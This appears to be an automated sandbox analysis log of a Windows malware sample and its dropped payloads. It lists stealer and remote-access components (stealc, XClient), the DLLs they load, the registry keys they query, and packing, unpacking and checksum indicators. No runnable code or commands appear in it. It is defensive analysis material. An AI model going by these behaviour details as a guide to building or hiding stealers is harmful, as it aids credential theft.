Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: ieframe.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: version.dll
Source: C:\Windows\explorer.exe	Section loaded: msiso.dll
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: PQ2AUndsdb.exe

Static file information: File size 1901056 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: PQ2AUndsdb.exe

Static PE information: Raw size of rxawdntq is bigger than: 0x100000 < 0x19e800

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 0000001F.00000002.2196839633.0000000069AED000.00000002.00000001.01000000.0000001B.sdmp, mozglue[1].dll.31.dr, mozglue.dll.31.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.31.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.31.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, nss3[1].dll.31.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.31.dr
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, nss3[1].dll.31.dr
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 0000001F.00000002.2196839633.0000000069AED000.00000002.00000001.01000000.0000001B.sdmp, mozglue[1].dll.31.dr, mozglue.dll.31.dr
Source:	Binary string: G.pdb source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Unpacked PE file: 0.2.PQ2AUndsdb.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 5.2.axplong.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 17.2.axplong.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rxawdntq:EW;tdrtfhuo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Unpacked PE file: 30.2.setup2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

.NET source code contains potential unpacker

Source: XClient_protected[1].exe.17.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: XClient_protected.exe.17.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: XClient_protected[1].exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x25204
Source: GOLD.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: stealc_default2.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: GOLD[1].exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d3f69 should be: 0x1d3e10
Source: PQ2AUndsdb.exe	Static PE information: real checksum: 0x1d3f69 should be: 0x1d3e10
Source: stealc_default2[1].exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: runtime.exe.17.dr	Static PE information: real checksum: 0x1184dc should be: 0x127164
Source: whiteheroin.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0xbcc70
Source: XClient_protected.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x25204
Source: runtime[1].exe.17.dr	Static PE information: real checksum: 0x1184dc should be: 0x127164
Source: crypteda.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: crypteda[1].exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1

Source: PQ2AUndsdb.exe	Static PE information: section name:
Source: PQ2AUndsdb.exe	Static PE information: section name: .idata
Source: PQ2AUndsdb.exe	Static PE information: section name:
Source: PQ2AUndsdb.exe	Static PE information: section name: rxawdntq
Source: PQ2AUndsdb.exe	Static PE information: section name: tdrtfhuo
Source: PQ2AUndsdb.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: rxawdntq
Source: axplong.exe.0.dr	Static PE information: section name: tdrtfhuo
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: Set-up[1].exe.17.dr	Static PE information: section name: /4
Source: Set-up[1].exe.17.dr	Static PE information: section name: /14
Source: Set-up[1].exe.17.dr	Static PE information: section name: /29
Source: Set-up[1].exe.17.dr	Static PE information: section name: /41
Source: Set-up[1].exe.17.dr	Static PE information: section name: /55
Source: Set-up[1].exe.17.dr	Static PE information: section name: /67
Source: Set-up[1].exe.17.dr	Static PE information: section name: /80
Source: Set-up[1].exe.17.dr	Static PE information: section name: /91
Source: Set-up[1].exe.17.dr	Static PE information: section name: /102
Source: Set-up.exe.17.dr	Static PE information: section name: /4
Source: Set-up.exe.17.dr	Static PE information: section name: /14
Source: Set-up.exe.17.dr	Static PE information: section name: /29
Source: Set-up.exe.17.dr	Static PE information: section name: /41
Source: Set-up.exe.17.dr	Static PE information: section name: /55
Source: Set-up.exe.17.dr	Static PE information: section name: /67
Source: Set-up.exe.17.dr	Static PE information: section name: /80
Source: Set-up.exe.17.dr	Static PE information: section name: /91
Source: Set-up.exe.17.dr	Static PE information: section name: /102
Source: BitcoinCore[1].exe.17.dr	Static PE information: section name: .didata

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005DD84C push ecx; ret	17_2_005DD85F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06473158 pushad ; retf	20_2_06473171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0649E320 push es; ret	20_2_0649E330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0649EFB2 push eax; ret	20_2_0649EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0675C980 push es; retn 0004h	20_2_0675CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067591E8 push es; retn 0004h	20_2_06759320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067591E8 push es; retn 0004h	20_2_06759340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067578D0 push es; ret	20_2_067578E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06757953 push es; ret	20_2_067579A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06794E08 pushfd ; iretd	20_2_06794E15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06794860 push es; ret	20_2_06794886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_067A1DD1 push es; ret	20_2_067A1DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00428E7D push esi; ret	25_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_004076D3 push ecx; ret	25_2_004076E6
